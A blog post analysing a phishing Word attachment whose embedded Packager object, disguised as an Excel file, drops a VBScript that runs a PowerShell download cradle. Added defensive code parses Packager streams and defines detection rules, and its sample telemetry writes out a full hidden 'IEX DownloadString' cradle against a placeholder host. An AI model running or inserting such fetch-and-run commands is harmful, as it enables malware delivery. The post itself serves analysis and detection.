Packager Shell Object being used as Infection Vector

Today, something interesting came across my desk. A user forwarded me an email that claimed to be an invoice, and attached to it was a Word document. At first, I was excited to take a look at another malicious Office macro. When I opened the document, I was kind of let down. All I saw was an embedded Excel file:

[Screenshot 1]

Looking at the properties of that file, I quickly noticed that it wasn't an Excel file at all. When you double-click on it, you will notice that a VBScript file gets dropped into AppData\Local\Temp.

[Screenshot 2]
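The "properties" check above can be automated. The Packager Shell Object stores the real file name and the raw bytes of whatever it wraps in an `\x01Ole10Native` stream inside the embedded OLE object (`word/embeddings/oleObjectN.bin` in a .docx), no matter which icon the document shows. The following parser is an added example, not code from the post or from any analysis tool; it assumes the stream has already been pulled out of the OLE container (for instance with olefile), follows the stream layout documented by oletools' oleobj module, and runs against a constructed sample stream rather than the real attachment:

```python
import os
import struct

# Added example (not from the original post). Parses the "\x01Ole10Native"
# stream that a Packager Shell Object writes inside an embedded OLE object.
# Assumes the stream was already extracted from the OLE container (e.g. with
# olefile); the layout follows the one documented in oletools' oleobj module.

SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta",
                     ".ps1", ".bat", ".cmd", ".exe", ".scr"}


def _cstring(buf, pos):
    """Read a NUL-terminated ANSI string starting at pos."""
    end = buf.index(b"\x00", pos)
    return buf[pos:end].decode("latin-1"), end + 1


def parse_ole10native(stream):
    """Return the packaged file's name, source path, temp path and raw bytes."""
    total_size = struct.unpack_from("<I", stream, 0)[0]
    if total_size + 4 > len(stream):
        raise ValueError("truncated Ole10Native stream")
    pos = 6  # skip total size (DWORD) and the flags word (usually 0x0002)
    filename, pos = _cstring(stream, pos)
    src_path, pos = _cstring(stream, pos)
    pos += 8  # two undocumented DWORDs
    tmp_len = struct.unpack_from("<I", stream, pos)[0]
    pos += 4
    tmp_path = stream[pos:pos + tmp_len].rstrip(b"\x00").decode("latin-1")
    pos += tmp_len
    data_len = struct.unpack_from("<I", stream, pos)[0]
    pos += 4
    data = stream[pos:pos + data_len]
    if len(data) != data_len:
        raise ValueError("embedded payload shorter than declared")
    return {"filename": filename, "src_path": src_path,
            "tmp_path": tmp_path, "data": data}


def is_disguised_script(info):
    """True when the packaged file is a script or executable, whatever icon the
    document shows for it (the Excel icon in the post is only presentation)."""
    ext = os.path.splitext(info["filename"])[1].lower()
    return ext in SCRIPT_EXTENSIONS


def build_sample_ole10native(filename, src_path, tmp_path, data):
    """Constructed test fixture: serialise a Packager stream with the layout above."""
    body = struct.pack("<H", 2)
    body += filename.encode("latin-1") + b"\x00"
    body += src_path.encode("latin-1") + b"\x00"
    body += b"\x00\x00\x00\x00\x03\x00\x00\x00"
    tmp = tmp_path.encode("latin-1") + b"\x00"
    body += struct.pack("<I", len(tmp)) + tmp
    body += struct.pack("<I", len(data)) + data
    return struct.pack("<I", len(body)) + body


# Constructed sample: a script packaged under a name that has nothing to do
# with Excel, which is what the post's "properties" check reveals.
SAMPLE_STREAM = build_sample_ole10native(
    "invoice.vbs",
    "C:\\Users\\sender\\invoice.vbs",
    "C:\\Users\\victim\\AppData\\Local\\Temp\\invoice.vbs",
    b'MsgBox "constructed placeholder, not the real script"\r\n',
)

if __name__ == "__main__":
    info = parse_ole10native(SAMPLE_STREAM)
    verdict = "SUSPICIOUS" if is_disguised_script(info) else "ok"
    print(info["filename"], "->", info["tmp_path"], verdict)
```

The `data` field is the dropped file itself, so the extracted bytes can be hashed and compared against the VBScript hash listed at the end of the post without ever double-clicking the object.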

When I opened the VBScript file, this is what I saw:

[Screenshot 5]

I should note that I do not do malware analysis, nor do I work in a full-fledged security job. I just work the helpdesk. Since I have other stuff to do, I took a shortcut when analyzing this code. The part I was interested in is the “CreateObject” portion at the top. I set the first portion of that line to a variable and echoed it back:

[Screenshot 6]

Here is the result:

[Screenshot 7]

I did the same for the “run” portion of the “CreateObject” line:

[Screenshot 8]

And the result:

[Screenshot 9]

It appears that the attackers are disguising VBScript files as Excel files. When you double-click on the embedded file, it saves the VBScript file to %Temp% and runs it. The script then uses the well-known PowerShell download cradle to fetch the payloads.

Just another interesting way attackers are combining Microsoft Office, VBScript and PowerShell into an infection vector.
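The chain described above (Word, then a script host running a .vbs out of %Temp%, then PowerShell fetching the next stage) is also what a defender can watch for in process-creation telemetry. The two rules below are an added example, not anything from the post; the event fields and the sample events are constructed for illustration and would need to be mapped onto your own EDR or Sysmon Event ID 1 schema:

```python
import re
from dataclasses import dataclass

# Added example (not from the original post): the process chain the post
# describes, written as two detection rules over process-creation events.
# Field names are assumed for this example.

@dataclass
class ProcEvent:
    event_id: int
    parent_image: str
    image: str
    command_line: str

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# A script file being launched out of the user's temp directory.
TEMP_SCRIPT = re.compile(
    r"\\appdata\\local\\temp\\[^\s\"']+\.(?:vbs|vbe|js|jse|wsf|hta)\b", re.I)

# Tokens that appear in the common PowerShell download cradles.
CRADLE = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|"
    r"invoke-expression|\biex\b|-enc(?:odedcommand)?\b", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (event_id, rule) pairs for events matching either stage."""
    hits = []
    for ev in events:
        parent, child = _basename(ev.parent_image), _basename(ev.image)
        # Stage 1: an Office application starts a script host on a temp script.
        if (parent in OFFICE_APPS and child in SCRIPT_HOSTS
                and TEMP_SCRIPT.search(ev.command_line)):
            hits.append((ev.event_id, "office_launches_temp_script"))
        # Stage 2: the script host starts PowerShell with cradle-like arguments.
        if (parent in SCRIPT_HOSTS and child in POWERSHELL
                and CRADLE.search(ev.command_line)):
            hits.append((ev.event_id, "script_host_powershell_cradle"))
    return hits


# Constructed telemetry, not real logs: events 1 and 2 reproduce the chain
# from the post; 3 and 4 are ordinary activity that should stay quiet.
SAMPLE_EVENTS = [
    ProcEvent(1, r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
              r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\bob\AppData\Local\Temp\invoice.vbs"'),
    ProcEvent(2, r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/stage2')\""),
    ProcEvent(3, r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\Office15\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Office15\EXCEL.EXE" "C:\Users\bob\Documents\q3.xlsx"'),
    ProcEvent(4, r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Get-Process"),
]

if __name__ == "__main__":
    for event_id, rule in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Keying the first rule on the parent being an Office application rather than on the script's file name keeps it useful when the attacker picks a different name in %Temp%; the second rule fires on the command line alone, so PowerShell script block logging is not required for it, although that logging is the better source once the cradle is obfuscated.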

The SHA256 of the initial document is here: 9e73ab4798b8fb49645e2cbb54d6e85e396ef14feb43b5f53d555e92274e92aa


The SHA256 of the VBScript file is here:

b9b4d926ad3396440f775300960396429c102a0aac18da5733b47449ad4bf801


-Matt N. (@enigma0x3)

5 thoughts on “Packager Shell Object being used as Infection Vector”

  1. Very nice investigation, but if you upload and check the file on VirusTotal, it has a detection ratio of 24/57 instead of the 1/57 from the hash that you mention in your article. What changed on it?

    Thanks
